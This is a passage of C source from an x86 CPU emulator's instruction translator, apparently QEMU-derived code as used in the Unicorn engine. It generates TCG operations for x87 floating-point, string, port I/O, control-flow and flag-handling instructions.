MO_LEUW); break; } if ((op & 7) == 3) gen_helper_fpop(tcg_ctx, tcg_ctx->cpu_env); break; } break; case 0x0c: /* fldenv mem */ gen_helper_fldenv(tcg_ctx, tcg_ctx->cpu_env, s->A0, tcg_const_i32(tcg_ctx, dflag - 1)); update_fip = update_fdp = false; break; case 0x0d: /* fldcw mem */ tcg_gen_qemu_ld_i32(tcg_ctx, s->tmp2_i32, s->A0, s->mem_index, MO_LEUW); gen_helper_fldcw(tcg_ctx, tcg_ctx->cpu_env, s->tmp2_i32); update_fip = update_fdp = false; break; case 0x0e: /* fnstenv mem */ gen_helper_fstenv(tcg_ctx, tcg_ctx->cpu_env, s->A0, tcg_const_i32(tcg_ctx, dflag - 1)); update_fip = update_fdp = false; break; case 0x0f: /* fnstcw mem */ gen_helper_fnstcw(tcg_ctx, s->tmp2_i32, tcg_ctx->cpu_env); tcg_gen_qemu_st_i32(tcg_ctx, s->tmp2_i32, s->A0, s->mem_index, MO_LEUW); update_fip = update_fdp = false; break; case 0x1d: /* fldt mem */ gen_helper_fldt_ST0(tcg_ctx, tcg_ctx->cpu_env, s->A0); break; case 0x1f: /* fstpt mem */ gen_helper_fstt_ST0(tcg_ctx, tcg_ctx->cpu_env, s->A0); gen_helper_fpop(tcg_ctx, tcg_ctx->cpu_env); break; case 0x2c: /* frstor mem */ gen_helper_frstor(tcg_ctx, tcg_ctx->cpu_env, s->A0, tcg_const_i32(tcg_ctx, dflag - 1)); update_fip = update_fdp = false; break; case 0x2e: /* fnsave mem */ gen_helper_fsave(tcg_ctx, tcg_ctx->cpu_env, s->A0, tcg_const_i32(tcg_ctx, dflag - 1)); update_fip = update_fdp = false; break; case 0x2f: /* fnstsw mem */ gen_helper_fnstsw(tcg_ctx, s->tmp2_i32, tcg_ctx->cpu_env); tcg_gen_qemu_st_i32(tcg_ctx, s->tmp2_i32, s->A0, s->mem_index, MO_LEUW); update_fip = update_fdp = false; break; case 0x3c: /* fbld */ gen_helper_fbld_ST0(tcg_ctx, tcg_ctx->cpu_env, s->A0); break; case 0x3e: /* fbstp */ gen_helper_fbst_ST0(tcg_ctx, tcg_ctx->cpu_env, s->A0); gen_helper_fpop(tcg_ctx, tcg_ctx->cpu_env); break; case 0x3d: /* fildll */ tcg_gen_qemu_ld_i64(tcg_ctx, s->tmp1_i64, s->A0, s->mem_index, MO_LEQ); gen_helper_fildll_ST0(tcg_ctx, tcg_ctx->cpu_env, s->tmp1_i64); break; case 0x3f: /* fistpll */ gen_helper_fistll_ST0(tcg_ctx, s->tmp1_i64, tcg_ctx->cpu_env); tcg_gen_qemu_st_i64(tcg_ctx, s->tmp1_i64, s->A0, s->mem_index, MO_LEQ); gen_helper_fpop(tcg_ctx, tcg_ctx->cpu_env); break; default: goto unknown_op; } if (update_fdp) { int last_seg = s->override >= 0 ? s->override : a.def_seg; tcg_gen_ld_i32(tcg_ctx, s->tmp2_i32, tcg_ctx->cpu_env, offsetof(CPUX86State, segs[last_seg].selector)); tcg_gen_st16_i32(tcg_ctx, s->tmp2_i32, tcg_ctx->cpu_env, offsetof(CPUX86State, fpds)); tcg_gen_st_tl(tcg_ctx, last_addr, tcg_ctx->cpu_env, offsetof(CPUX86State, fpdp)); } tcg_temp_free(tcg_ctx, last_addr); } else { /* register float ops */ opreg = rm; switch(op) { case 0x08: /* fld sti */ gen_helper_fpush(tcg_ctx, tcg_ctx->cpu_env); gen_helper_fmov_ST0_STN(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, (opreg + 1) & 7)); break; case 0x09: /* fxchg sti */ case 0x29: /* fxchg4 sti, undocumented op */ case 0x39: /* fxchg7 sti, undocumented op */ gen_helper_fxchg_ST0_STN(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, opreg)); break; case 0x0a: /* grp d9/2 */ switch(rm) { case 0: /* fnop */ /* check exceptions (FreeBSD FPU probe) */ gen_helper_fwait(tcg_ctx, tcg_ctx->cpu_env); update_fip = false; break; default: goto unknown_op; } break; case 0x0c: /* grp d9/4 */ switch(rm) { case 0: /* fchs */ gen_helper_fchs_ST0(tcg_ctx, tcg_ctx->cpu_env); break; case 1: /* fabs */ gen_helper_fabs_ST0(tcg_ctx, tcg_ctx->cpu_env); break; case 4: /* ftst */ gen_helper_fldz_FT0(tcg_ctx, tcg_ctx->cpu_env); gen_helper_fcom_ST0_FT0(tcg_ctx, tcg_ctx->cpu_env); break; case 5: /* fxam */ gen_helper_fxam_ST0(tcg_ctx, tcg_ctx->cpu_env); break; default: goto unknown_op; } break; case 0x0d: /* grp d9/5 */ { switch(rm) { case 0: gen_helper_fpush(tcg_ctx, tcg_ctx->cpu_env); gen_helper_fld1_ST0(tcg_ctx, tcg_ctx->cpu_env); break; case 1: gen_helper_fpush(tcg_ctx, tcg_ctx->cpu_env); gen_helper_fldl2t_ST0(tcg_ctx, tcg_ctx->cpu_env); break; case 2: gen_helper_fpush(tcg_ctx, tcg_ctx->cpu_env); gen_helper_fldl2e_ST0(tcg_ctx, tcg_ctx->cpu_env); break; case 3: gen_helper_fpush(tcg_ctx, tcg_ctx->cpu_env); gen_helper_fldpi_ST0(tcg_ctx, tcg_ctx->cpu_env); break; case 4: gen_helper_fpush(tcg_ctx, tcg_ctx->cpu_env); gen_helper_fldlg2_ST0(tcg_ctx, tcg_ctx->cpu_env); break; case 5: gen_helper_fpush(tcg_ctx, tcg_ctx->cpu_env); gen_helper_fldln2_ST0(tcg_ctx, tcg_ctx->cpu_env); break; case 6: gen_helper_fpush(tcg_ctx, tcg_ctx->cpu_env); gen_helper_fldz_ST0(tcg_ctx, tcg_ctx->cpu_env); break; default: goto unknown_op; } } break; case 0x0e: /* grp d9/6 */ switch(rm) { case 0: /* f2xm1 */ gen_helper_f2xm1(tcg_ctx, tcg_ctx->cpu_env); break; case 1: /* fyl2x */ gen_helper_fyl2x(tcg_ctx, tcg_ctx->cpu_env); break; case 2: /* fptan */ gen_helper_fptan(tcg_ctx, tcg_ctx->cpu_env); break; case 3: /* fpatan */ gen_helper_fpatan(tcg_ctx, tcg_ctx->cpu_env); break; case 4: /* fxtract */ gen_helper_fxtract(tcg_ctx, tcg_ctx->cpu_env); break; case 5: /* fprem1 */ gen_helper_fprem1(tcg_ctx, tcg_ctx->cpu_env); break; case 6: /* fdecstp */ gen_helper_fdecstp(tcg_ctx, tcg_ctx->cpu_env); break; default: case 7: /* fincstp */ gen_helper_fincstp(tcg_ctx, tcg_ctx->cpu_env); break; } break; case 0x0f: /* grp d9/7 */ switch(rm) { case 0: /* fprem */ gen_helper_fprem(tcg_ctx, tcg_ctx->cpu_env); break; case 1: /* fyl2xp1 */ gen_helper_fyl2xp1(tcg_ctx, tcg_ctx->cpu_env); break; case 2: /* fsqrt */ gen_helper_fsqrt(tcg_ctx, tcg_ctx->cpu_env); break; case 3: /* fsincos */ gen_helper_fsincos(tcg_ctx, tcg_ctx->cpu_env); break; case 5: /* fscale */ gen_helper_fscale(tcg_ctx, tcg_ctx->cpu_env); break; case 4: /* frndint */ gen_helper_frndint(tcg_ctx, tcg_ctx->cpu_env); break; case 6: /* fsin */ gen_helper_fsin(tcg_ctx, tcg_ctx->cpu_env); break; default: case 7: /* fcos */ gen_helper_fcos(tcg_ctx, tcg_ctx->cpu_env); break; } break; case 0x00: case 0x01: case 0x04: /* fxxx st, sti */ case 0x05: /* fxxx st, sti */ case 0x06: /* fxxx st, sti */ case 0x07: /* fxxx st, sti */ case 0x20: case 0x21: case 0x24: /* fxxx sti, st */ case 0x25: /* fxxx sti, st */ case 0x26: /* fxxx sti, st */ case 0x27: /* fxxx sti, st */ case 0x30: case 0x31: case 0x34: /* fxxxp sti, st */ case 0x35: /* fxxxp sti, st */ case 0x36: /* fxxxp sti, st */ case 0x37: /* fxxxp sti, st */ { int op1; op1 = op & 7; if (op >= 0x20) { gen_helper_fp_arith_STN_ST0(tcg_ctx, op1, opreg); if (op >= 0x30) gen_helper_fpop(tcg_ctx, tcg_ctx->cpu_env); } else { gen_helper_fmov_FT0_STN(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, opreg)); gen_helper_fp_arith_ST0_FT0(tcg_ctx, op1); } } break; case 0x02: /* fcom */ case 0x22: /* fcom2, undocumented op */ gen_helper_fmov_FT0_STN(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, opreg)); gen_helper_fcom_ST0_FT0(tcg_ctx, tcg_ctx->cpu_env); break; case 0x03: /* fcomp */ case 0x23: /* fcomp3, undocumented op */ case 0x32: /* fcomp5, undocumented op */ gen_helper_fmov_FT0_STN(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, opreg)); gen_helper_fcom_ST0_FT0(tcg_ctx, tcg_ctx->cpu_env); gen_helper_fpop(tcg_ctx, tcg_ctx->cpu_env); break; case 0x15: /* da/5 */ switch(rm) { case 1: /* fucompp */ gen_helper_fmov_FT0_STN(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, 1)); gen_helper_fucom_ST0_FT0(tcg_ctx, tcg_ctx->cpu_env); gen_helper_fpop(tcg_ctx, tcg_ctx->cpu_env); gen_helper_fpop(tcg_ctx, tcg_ctx->cpu_env); break; default: goto unknown_op; } break; case 0x1c: switch(rm) { case 0: /* feni (287 only, just do nop here) */ break; case 1: /* fdisi (287 only, just do nop here) */ break; case 2: /* fclex */ gen_helper_fclex(tcg_ctx, tcg_ctx->cpu_env); update_fip = false; break; case 3: /* fninit */ gen_helper_fninit(tcg_ctx, tcg_ctx->cpu_env); update_fip = false; break; case 4: /* fsetpm (287 only, just do nop here) */ break; default: goto unknown_op; } break; case 0x1d: /* fucomi */ if (!(s->cpuid_features & CPUID_CMOV)) { goto illegal_op; } gen_update_cc_op(s); gen_helper_fmov_FT0_STN(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, opreg)); gen_helper_fucomi_ST0_FT0(tcg_ctx, tcg_ctx->cpu_env); set_cc_op(s, CC_OP_EFLAGS); break; case 0x1e: /* fcomi */ if (!(s->cpuid_features & CPUID_CMOV)) { goto illegal_op; } gen_update_cc_op(s); gen_helper_fmov_FT0_STN(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, opreg)); gen_helper_fcomi_ST0_FT0(tcg_ctx, tcg_ctx->cpu_env); set_cc_op(s, CC_OP_EFLAGS); break; case 0x28: /* ffree sti */ gen_helper_ffree_STN(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, opreg)); break; case 0x2a: /* fst sti */ gen_helper_fmov_STN_ST0(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, opreg)); break; case 0x2b: /* fstp sti */ case 0x0b: /* fstp1 sti, undocumented op */ case 0x3a: /* fstp8 sti, undocumented op */ case 0x3b: /* fstp9 sti, undocumented op */ gen_helper_fmov_STN_ST0(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, opreg)); gen_helper_fpop(tcg_ctx, tcg_ctx->cpu_env); break; case 0x2c: /* fucom st(i) */ gen_helper_fmov_FT0_STN(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, opreg)); gen_helper_fucom_ST0_FT0(tcg_ctx, tcg_ctx->cpu_env); break; case 0x2d: /* fucomp st(i) */ gen_helper_fmov_FT0_STN(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, opreg)); gen_helper_fucom_ST0_FT0(tcg_ctx, tcg_ctx->cpu_env); gen_helper_fpop(tcg_ctx, tcg_ctx->cpu_env); break; case 0x33: /* de/3 */ switch(rm) { case 1: /* fcompp */ gen_helper_fmov_FT0_STN(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, 1)); gen_helper_fcom_ST0_FT0(tcg_ctx, tcg_ctx->cpu_env); gen_helper_fpop(tcg_ctx, tcg_ctx->cpu_env); gen_helper_fpop(tcg_ctx, tcg_ctx->cpu_env); break; default: goto unknown_op; } break; case 0x38: /* ffreep sti, undocumented op */ gen_helper_ffree_STN(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, opreg)); gen_helper_fpop(tcg_ctx, tcg_ctx->cpu_env); break; case 0x3c: /* df/4 */ switch(rm) { case 0: gen_helper_fnstsw(tcg_ctx, s->tmp2_i32, tcg_ctx->cpu_env); tcg_gen_extu_i32_tl(tcg_ctx, s->T0, s->tmp2_i32); gen_op_mov_reg_v(s, MO_16, R_EAX, s->T0); break; default: goto unknown_op; } break; case 0x3d: /* fucomip */ if (!(s->cpuid_features & CPUID_CMOV)) { goto illegal_op; } gen_update_cc_op(s); gen_helper_fmov_FT0_STN(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, opreg)); gen_helper_fucomi_ST0_FT0(tcg_ctx, tcg_ctx->cpu_env); gen_helper_fpop(tcg_ctx, tcg_ctx->cpu_env); set_cc_op(s, CC_OP_EFLAGS); break; case 0x3e: /* fcomip */ if (!(s->cpuid_features & CPUID_CMOV)) { goto illegal_op; } gen_update_cc_op(s); gen_helper_fmov_FT0_STN(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, opreg)); gen_helper_fcomi_ST0_FT0(tcg_ctx, tcg_ctx->cpu_env); gen_helper_fpop(tcg_ctx, tcg_ctx->cpu_env); set_cc_op(s, CC_OP_EFLAGS); break; case 0x10: /* fcmovxx */ case 0x11: /* fcmovxx */ case 0x12: /* fcmovxx */ case 0x13: /* fcmovxx */ case 0x18: case 0x19: case 0x1a: case 0x1b: { int op1; TCGLabel *l1; static const uint8_t fcmov_cc[8] = { (JCC_B << 1), (JCC_Z << 1), (JCC_BE << 1), (JCC_P << 1), }; if (!(s->cpuid_features & CPUID_CMOV)) { goto illegal_op; } op1 = fcmov_cc[op & 3] | (((op >> 3) & 1) ^ 1); l1 = gen_new_label(tcg_ctx); gen_jcc1_noeob(s, op1, l1); gen_helper_fmov_ST0_STN(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, opreg)); gen_set_label(tcg_ctx, l1); } break; default: goto unknown_op; } } if (update_fip) { tcg_gen_ld_i32(tcg_ctx, s->tmp2_i32, tcg_ctx->cpu_env, offsetof(CPUX86State, segs[R_CS].selector)); tcg_gen_st16_i32(tcg_ctx, s->tmp2_i32, tcg_ctx->cpu_env, offsetof(CPUX86State, fpcs)); tcg_gen_st_tl(tcg_ctx, tcg_const_tl(tcg_ctx, pc_start - s->cs_base), tcg_ctx->cpu_env, offsetof(CPUX86State, fpip)); } } break; /************************/ /* string ops */ case 0xa4: /* movsS */ case 0xa5: ot = mo_b_d(b, dflag); if (prefixes & (PREFIX_REPZ | PREFIX_REPNZ)) { gen_repz_movs(s, ot, pc_start - s->cs_base, s->pc - s->cs_base); } else { gen_movs(s, ot); } break; case 0xaa: /* stosS */ case 0xab: ot = mo_b_d(b, dflag); if (prefixes & (PREFIX_REPZ | PREFIX_REPNZ)) { gen_repz_stos(s, ot, pc_start - s->cs_base, s->pc - s->cs_base); } else { gen_stos(s, ot); } break; case 0xac: /* lodsS */ case 0xad: ot = mo_b_d(b, dflag); if (prefixes & (PREFIX_REPZ | PREFIX_REPNZ)) { gen_repz_lods(s, ot, pc_start - s->cs_base, s->pc - s->cs_base); } else { gen_lods(s, ot); } break; case 0xae: /* scasS */ case 0xaf: ot = mo_b_d(b, dflag); if (prefixes & PREFIX_REPNZ) { gen_repz_scas(s, ot, pc_start - s->cs_base, s->pc - s->cs_base, 1); } else if (prefixes & PREFIX_REPZ) { gen_repz_scas(s, ot, pc_start - s->cs_base, s->pc - s->cs_base, 0); } else { gen_scas(s, ot); } break; case 0xa6: /* cmpsS */ case 0xa7: ot = mo_b_d(b, dflag); if (prefixes & PREFIX_REPNZ) { gen_repz_cmps(s, ot, pc_start - s->cs_base, s->pc - s->cs_base, 1); } else if (prefixes & PREFIX_REPZ) { gen_repz_cmps(s, ot, pc_start - s->cs_base, s->pc - s->cs_base, 0); } else { gen_cmps(s, ot); } break; case 0x6c: /* insS */ case 0x6d: ot = mo_b_d32(b, dflag); tcg_gen_ext16u_tl(tcg_ctx, s->T0, tcg_ctx->cpu_regs[R_EDX]); gen_check_io(s, ot, pc_start - s->cs_base, SVM_IOIO_TYPE_MASK | svm_is_rep(prefixes) | 4); if (prefixes & (PREFIX_REPZ | PREFIX_REPNZ)) { gen_repz_ins(s, ot, pc_start - s->cs_base, s->pc - s->cs_base); } else { gen_ins(s, ot); if (tb_cflags(s->base.tb) & CF_USE_ICOUNT) { gen_jmp(s, s->pc - s->cs_base); } } break; case 0x6e: /* outsS */ case 0x6f: ot = mo_b_d32(b, dflag); tcg_gen_ext16u_tl(tcg_ctx, s->T0, tcg_ctx->cpu_regs[R_EDX]); gen_check_io(s, ot, pc_start - s->cs_base, svm_is_rep(prefixes) | 4); if (prefixes & (PREFIX_REPZ | PREFIX_REPNZ)) { gen_repz_outs(s, ot, pc_start - s->cs_base, s->pc - s->cs_base); } else { gen_outs(s, ot); if (tb_cflags(s->base.tb) & CF_USE_ICOUNT) { gen_jmp(s, s->pc - s->cs_base); } } break; /************************/ /* port I/O */ case 0xe4: case 0xe5: ot = mo_b_d32(b, dflag); val = x86_ldub_code(env, s); tcg_gen_movi_tl(tcg_ctx, s->T0, val); gen_check_io(s, ot, pc_start - s->cs_base, SVM_IOIO_TYPE_MASK | svm_is_rep(prefixes)); if (tb_cflags(s->base.tb) & CF_USE_ICOUNT) { gen_io_start(tcg_ctx); } tcg_gen_movi_i32(tcg_ctx, s->tmp2_i32, val); gen_helper_in_func(tcg_ctx, ot, s->T1, s->tmp2_i32); gen_op_mov_reg_v(s, ot, R_EAX, s->T1); gen_bpt_io(s, s->tmp2_i32, ot); if (tb_cflags(s->base.tb) & CF_USE_ICOUNT) { gen_jmp(s, s->pc - s->cs_base); } break; case 0xe6: case 0xe7: ot = mo_b_d32(b, dflag); val = x86_ldub_code(env, s); tcg_gen_movi_tl(tcg_ctx, s->T0, val); gen_check_io(s, ot, pc_start - s->cs_base, svm_is_rep(prefixes)); gen_op_mov_v_reg(s, ot, s->T1, R_EAX); if (tb_cflags(s->base.tb) & CF_USE_ICOUNT) { gen_io_start(tcg_ctx); } tcg_gen_movi_i32(tcg_ctx, s->tmp2_i32, val); tcg_gen_trunc_tl_i32(tcg_ctx, s->tmp3_i32, s->T1); gen_helper_out_func(tcg_ctx, ot, s->tmp2_i32, s->tmp3_i32); gen_bpt_io(s, s->tmp2_i32, ot); if (tb_cflags(s->base.tb) & CF_USE_ICOUNT) { gen_jmp(s, s->pc - s->cs_base); } break; case 0xec: case 0xed: ot = mo_b_d32(b, dflag); tcg_gen_ext16u_tl(tcg_ctx, s->T0, tcg_ctx->cpu_regs[R_EDX]); gen_check_io(s, ot, pc_start - s->cs_base, SVM_IOIO_TYPE_MASK | svm_is_rep(prefixes)); if (tb_cflags(s->base.tb) & CF_USE_ICOUNT) { gen_io_start(tcg_ctx); } tcg_gen_trunc_tl_i32(tcg_ctx, s->tmp2_i32, s->T0); gen_helper_in_func(tcg_ctx, ot, s->T1, s->tmp2_i32); gen_op_mov_reg_v(s, ot, R_EAX, s->T1); gen_bpt_io(s, s->tmp2_i32, ot); if (tb_cflags(s->base.tb) & CF_USE_ICOUNT) { gen_jmp(s, s->pc - s->cs_base); } break; case 0xee: case 0xef: ot = mo_b_d32(b, dflag); tcg_gen_ext16u_tl(tcg_ctx, s->T0, tcg_ctx->cpu_regs[R_EDX]); gen_check_io(s, ot, pc_start - s->cs_base, svm_is_rep(prefixes)); gen_op_mov_v_reg(s, ot, s->T1, R_EAX); if (tb_cflags(s->base.tb) & CF_USE_ICOUNT) { gen_io_start(tcg_ctx); } tcg_gen_trunc_tl_i32(tcg_ctx, s->tmp2_i32, s->T0); tcg_gen_trunc_tl_i32(tcg_ctx, s->tmp3_i32, s->T1); gen_helper_out_func(tcg_ctx, ot, s->tmp2_i32, s->tmp3_i32); gen_bpt_io(s, s->tmp2_i32, ot); if (tb_cflags(s->base.tb) & CF_USE_ICOUNT) { gen_jmp(s, s->pc - s->cs_base); } break; /************************/ /* control */ case 0xc2: /* ret im */ val = x86_ldsw_code(env, s); ot = gen_pop_T0(s); gen_stack_update(s, val + (1 << ot)); /* Note that gen_pop_T0 uses a zero-extending load. */ gen_op_jmp_v(tcg_ctx, s->T0); gen_bnd_jmp(s); gen_jr(s, s->T0); break; case 0xc3: /* ret */ ot = gen_pop_T0(s); gen_pop_update(s, ot); /* Note that gen_pop_T0 uses a zero-extending load. */ gen_op_jmp_v(tcg_ctx, s->T0); gen_bnd_jmp(s); gen_jr(s, s->T0); break; case 0xca: /* lret im */ val = x86_ldsw_code(env, s); do_lret: if (s->pe && !s->vm86) { gen_update_cc_op(s); gen_jmp_im(s, pc_start - s->cs_base); gen_helper_lret_protected(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, dflag - 1), tcg_const_i32(tcg_ctx, val)); } else { gen_stack_A0(s); /* pop offset */ gen_op_ld_v(s, dflag, s->T0, s->A0); /* NOTE: keeping EIP updated is not a problem in case of exception */ gen_op_jmp_v(tcg_ctx, s->T0); /* pop selector */ gen_add_A0_im(s, 1 << dflag); gen_op_ld_v(s, dflag, s->T0, s->A0); gen_op_movl_seg_T0_vm(s, R_CS); /* add stack offset */ gen_stack_update(s, val + (2 << dflag)); } gen_eob(s); break; case 0xcb: /* lret */ val = 0; goto do_lret; case 0xcf: /* iret */ gen_svm_check_intercept(s, pc_start, SVM_EXIT_IRET); if (!s->pe) { /* real mode */ gen_helper_iret_real(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, dflag - 1)); set_cc_op(s, CC_OP_EFLAGS); } else if (s->vm86) { if (s->iopl != 3) { gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); } else { gen_helper_iret_real(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, dflag - 1)); set_cc_op(s, CC_OP_EFLAGS); } } else { gen_helper_iret_protected(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, dflag - 1), tcg_const_i32(tcg_ctx, s->pc - s->cs_base)); set_cc_op(s, CC_OP_EFLAGS); } gen_eob(s); break; case 0xe8: /* call im */ { if (dflag != MO_16) { tval = (int32_t)insn_get(env, s, MO_32); } else { tval = (int16_t)insn_get(env, s, MO_16); } next_eip = s->pc - s->cs_base; tval += next_eip; if (dflag == MO_16) { tval &= 0xffff; } else if (!CODE64(s)) { tval &= 0xffffffff; } tcg_gen_movi_tl(tcg_ctx, s->T0, next_eip); gen_push_v(s, s->T0); gen_bnd_jmp(s); gen_jmp(s, tval); } break; case 0x9a: /* lcall im */ { unsigned int selector, offset; if (CODE64(s)) goto illegal_op; ot = dflag; offset = insn_get(env, s, ot); selector = insn_get(env, s, MO_16); tcg_gen_movi_tl(tcg_ctx, s->T0, selector); tcg_gen_movi_tl(tcg_ctx, s->T1, offset); } goto do_lcall; case 0xe9: /* jmp im */ if (dflag != MO_16) { tval = (int32_t)insn_get(env, s, MO_32); } else { tval = (int16_t)insn_get(env, s, MO_16); } tval += s->pc - s->cs_base; if (dflag == MO_16) { tval &= 0xffff; } else if (!CODE64(s)) { tval &= 0xffffffff; } gen_bnd_jmp(s); gen_jmp(s, tval); break; case 0xea: /* ljmp im */ { unsigned int selector, offset; if (CODE64(s)) goto illegal_op; ot = dflag; offset = insn_get(env, s, ot); selector = insn_get(env, s, MO_16); tcg_gen_movi_tl(tcg_ctx, s->T0, selector); tcg_gen_movi_tl(tcg_ctx, s->T1, offset); } goto do_ljmp; case 0xeb: /* jmp Jb */ tval = (int8_t)insn_get(env, s, MO_8); tval += s->pc - s->cs_base; if (dflag == MO_16) { tval &= 0xffff; } gen_jmp(s, tval); break; case 0x70: /* jcc Jb */ case 0x71: /* jcc Jb */ case 0x72: /* jcc Jb */ case 0x73: /* jcc Jb */ case 0x74: /* jcc Jb */ case 0x75: /* jcc Jb */ case 0x76: /* jcc Jb */ case 0x77: /* jcc Jb */ case 0x78: /* jcc Jb */ case 0x79: /* jcc Jb */ case 0x7a: /* jcc Jb */ case 0x7b: /* jcc Jb */ case 0x7c: /* jcc Jb */ case 0x7d: /* jcc Jb */ case 0x7e: /* jcc Jb */ case 0x7f: /* jcc Jb */ tval = (int8_t)insn_get(env, s, MO_8); goto do_jcc; case 0x180: /* jcc Jv */ case 0x181: /* jcc Jv */ case 0x182: /* jcc Jv */ case 0x183: /* jcc Jv */ case 0x184: /* jcc Jv */ case 0x185: /* jcc Jv */ case 0x186: /* jcc Jv */ case 0x187: /* jcc Jv */ case 0x188: /* jcc Jv */ case 0x189: /* jcc Jv */ case 0x18a: /* jcc Jv */ case 0x18b: /* jcc Jv */ case 0x18c: /* jcc Jv */ case 0x18d: /* jcc Jv */ case 0x18e: /* jcc Jv */ case 0x18f: /* jcc Jv */ if (dflag != MO_16) { tval = (int32_t)insn_get(env, s, MO_32); } else { tval = (int16_t)insn_get(env, s, MO_16); } do_jcc: next_eip = s->pc - s->cs_base; tval += next_eip; if (dflag == MO_16) { tval &= 0xffff; } gen_bnd_jmp(s); gen_jcc(s, b, tval, next_eip); break; case 0x190: /* setcc Gv */ case 0x191: /* setcc Gv */ case 0x192: /* setcc Gv */ case 0x193: /* setcc Gv */ case 0x194: /* setcc Gv */ case 0x195: /* setcc Gv */ case 0x196: /* setcc Gv */ case 0x197: /* setcc Gv */ case 0x198: /* setcc Gv */ case 0x199: /* setcc Gv */ case 0x19a: /* setcc Gv */ case 0x19b: /* setcc Gv */ case 0x19c: /* setcc Gv */ case 0x19d: /* setcc Gv */ case 0x19e: /* setcc Gv */ case 0x19f: /* setcc Gv */ modrm = x86_ldub_code(env, s); gen_setcc1(s, b, s->T0); gen_ldst_modrm(env, s, modrm, MO_8, OR_TMP0, 1); break; case 0x140: /* cmov Gv, Ev */ case 0x141: /* cmov Gv, Ev */ case 0x142: /* cmov Gv, Ev */ case 0x143: /* cmov Gv, Ev */ case 0x144: /* cmov Gv, Ev */ case 0x145: /* cmov Gv, Ev */ case 0x146: /* cmov Gv, Ev */ case 0x147: /* cmov Gv, Ev */ case 0x148: /* cmov Gv, Ev */ case 0x149: /* cmov Gv, Ev */ case 0x14a: /* cmov Gv, Ev */ case 0x14b: /* cmov Gv, Ev */ case 0x14c: /* cmov Gv, Ev */ case 0x14d: /* cmov Gv, Ev */ case 0x14e: /* cmov Gv, Ev */ case 0x14f: /* cmov Gv, Ev */ if (!(s->cpuid_features & CPUID_CMOV)) { goto illegal_op; } ot = dflag; modrm = x86_ldub_code(env, s); reg = ((modrm >> 3) & 7) | rex_r; gen_cmovcc1(env, s, ot, b, modrm, reg); break; /************************/ /* flags */ case 0x9c: /* pushf */ gen_svm_check_intercept(s, pc_start, SVM_EXIT_PUSHF); if (s->vm86 && s->iopl != 3) { gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); } else { gen_update_cc_op(s); gen_helper_read_eflags(tcg_ctx, s->T0, tcg_ctx->cpu_env); gen_push_v(s, s->T0); } break; case 0x9d: /* popf */ gen_svm_check_intercept(s, pc_start, SVM_EXIT_POPF); if (s->vm86 && s->iopl != 3) { gen_exception(s, EXCP0D_GPF, pc_start - s->cs_base); } else { ot = gen_pop_T0(s); if (s->cpl == 0) { if (dflag != MO_16) { gen_helper_write_eflags(tcg_ctx, tcg_ctx->cpu_env, s->T0, tcg_const_i32(tcg_ctx, (TF_MASK | AC_MASK | ID_MASK | NT_MASK | IF_MASK | IOPL_MASK))); } else { gen_helper_write_eflags(tcg_ctx, tcg_ctx->cpu_env, s->T0, tcg_const_i32(tcg_ctx, (TF_MASK | AC_MASK | ID_MASK | NT_MASK | IF_MASK | IOPL_MASK) & 0xffff)); } } else { if (s->cpl <= s->iopl) { if (dflag != MO_16) { gen_helper_write_eflags(tcg_ctx, tcg_ctx->cpu_env, s->T0, tcg_const_i32(tcg_ctx, (TF_MASK | AC_MASK | ID_MASK | NT_MASK | IF_MASK))); } else { gen_helper_write_eflags(tcg_ctx, tcg_ctx->cpu_env, s->T0, tcg_const_i32(tcg_ctx, (TF_MASK | AC_MASK | ID_MASK | NT_MASK | IF_MASK) & 0xffff)); } } else { if (dflag != MO_16) { gen_helper_write_eflags(tcg_ctx, tcg_ctx->cpu_env, s->T0, tcg_const_i32(tcg_ctx, (TF_MASK | AC_MASK | ID_MASK | NT_MASK))); } else { gen_helper_write_eflags(tcg_ctx, tcg_ctx->cpu_env, s->T0, tcg_const_i32(tcg_ctx, (TF_MASK | AC_MASK | ID_MASK | NT_MASK) & 0xffff)); } } } gen_pop_update(s, ot); set_cc_op(s, CC_OP_EFLAGS); /* abort translation because TF/AC flag may change */ gen_jmp_im(s, s->pc - s->cs_base); gen_eob(s); } break; case 0x9e: /* sahf */ if (CODE64(s) && !(s->cpuid_ext3_features & CPUID_EXT3_LAHF_LM)) goto illegal_op; gen_op_mov_v_reg(s, MO_8, s->T0, R_AH); gen_compute_eflags(s); tcg_gen_andi_tl(tcg_ctx, tcg_ctx->cpu_cc_src, tcg_ctx->cpu_cc_src, CC_O); tcg_gen_andi_tl(tcg_ctx, s->T0, s->T0, CC_S | CC_Z | CC_A | CC_P | CC_C); tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_cc_src, tcg_ctx->cpu_cc_src, s->T0); break; case 0x9f: /* lahf */ if (CODE64(s) && !(s->cpuid_ext3_features & CPUID_EXT3_LAHF_LM)) goto illegal_op; gen_compute_eflags(s); /* Note: gen_compute_eflags() only gives the condition codes */ tcg_gen_ori_tl(tcg_ctx, s->T0, 